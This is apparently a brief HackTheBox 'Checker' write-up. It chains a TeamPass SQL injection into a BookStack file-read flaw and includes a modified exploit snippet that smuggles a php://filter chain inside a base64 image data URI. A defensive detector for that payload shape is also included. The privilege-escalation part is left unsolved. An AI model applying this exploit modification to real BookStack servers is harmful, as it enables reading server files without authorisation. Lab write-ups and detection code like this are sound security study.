HTB_Checker
linux(hard)
Summary
user:
CVE-2023-1545->CVE-2023-6199
root:
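PWN: race-condition + command_exec, but I don't know how to do it
CVE-2023-6199 exploitation requirements:
Brute-force repeatedly using the possible wrapper formats; the exploit script is as follows: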
https://github.com/synacktiv/php_filter_chains_oracle_exploit
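Make slight modifications to requestor.py
1. The html content takes the form <img+src='data:image/png;base64,[BASE64 php_wrapper]'/>
2. The CSRF-TOKEN field and Cookie are required
My earlier change was as follows; there was no response, but the next day it could be exploited normally again... hmm, strange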
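# inside requestor.py (requires "import base64" at the top of the file)
filter_chain = f'php://filter/{s}{self.in_chain}/resource={self.file_to_leak}'
# wrap the filter chain as a base64 data URI inside an <img> tag
new_chain = f"<img src='data:image/png;base64,{base64.b64encode(filter_chain.encode()).decode()}'/>"
merged_data = self.parse_parameter(new_chain)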
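A defensive check for the payload shape described above, as an added example that is not code from the original post or from the affected application: it flags <img> data URIs whose base64 body decodes to a stream-wrapper URL instead of image bytes. The names ImgSrcCollector and audit_html and the sample inputs are assumptions made for illustration.

```python
import base64
import binascii
import re
from html.parser import HTMLParser

# Magic bytes a genuine embedded image starts with.
IMAGE_MAGIC = {"image/png": b"\x89PNG\r\n\x1a\n", "image/jpeg": b"\xff\xd8\xff", "image/gif": b"GIF8"}
DATA_URI = re.compile(r"^data:(?P<mime>[\w.+-]+/[\w.+-]+)?(?:;[\w=-]+)*;base64,(?P<b64>.*)$", re.I | re.S)
# Decoded payload that is a URL or stream wrapper (php://, file://, ...) rather than image bytes.
WRAPPER = re.compile(rb"^\s*([a-z][a-z0-9.+-]*)://", re.I)

class ImgSrcCollector(HTMLParser):
    """Collects the src attribute of every <img> tag."""
    def __init__(self):
        super().__init__()
        self.sources = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            self.sources += [v for k, v in attrs if k == "src" and v]

def audit_html(html):
    """Return one finding per <img> data URI whose payload is not the declared image."""
    collector = ImgSrcCollector()
    collector.feed(html)
    collector.close()
    findings = []
    for src in collector.sources:
        m = DATA_URI.match(src.strip())
        if not m:
            continue  # ordinary URL or non-base64 data URI: out of scope here
        mime = (m.group("mime") or "").lower()
        try:
            raw = base64.b64decode(m.group("b64"))
        except (binascii.Error, ValueError):
            findings.append({"reason": "undecodable-base64", "mime": mime})
            continue
        w = WRAPPER.match(raw)
        if w:
            findings.append({"reason": "stream-wrapper", "scheme": w.group(1).decode().lower(), "mime": mime})
        elif mime in IMAGE_MAGIC and not raw.startswith(IMAGE_MAGIC[mime]):
            findings.append({"reason": "magic-mismatch", "mime": mime})
    return findings

if __name__ == "__main__":
    # Constructed samples: a real PNG header, and a placeholder wrapper string.
    png = base64.b64encode(IMAGE_MAGIC["image/png"] + b"\x00" * 8).decode()
    bad = base64.b64encode(b"php://filter/PLACEHOLDER/resource=PLACEHOLDER").decode()
    for b64 in (png, bad):
        print(audit_html(f"<p>note</p><img src='data:image/png;base64,{b64}'/>"))
```

Run against the decoded html field of a save request before it is stored or rendered; a form-encoded body has to be URL-decoded first.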
PWN part... emmmm, I don't know how
References
Writeup:
https://4xura.com/ctf/htb/htb-writeup-checker/
CVE-2023-1545-teampass-SQLinject:
https://security.snyk.io/vuln/SNYK-PHP-NILSTEAMPASSNETTEAMPASS-3367612
CVE-2023-6199:
https://fluidattacks.com/advisories/imagination/
https://fluidattacks.com/blog/lfr-via-blind-ssrf-book-stack/
https://github.com/4xura/php_filter_chain_oracle_poc
php:// wrapper
https://github.com/synacktiv/php_filter_chains_oracle_exploit
Originally published on the WeChat official account (羽泪云小栈): HTB_Checker (user part)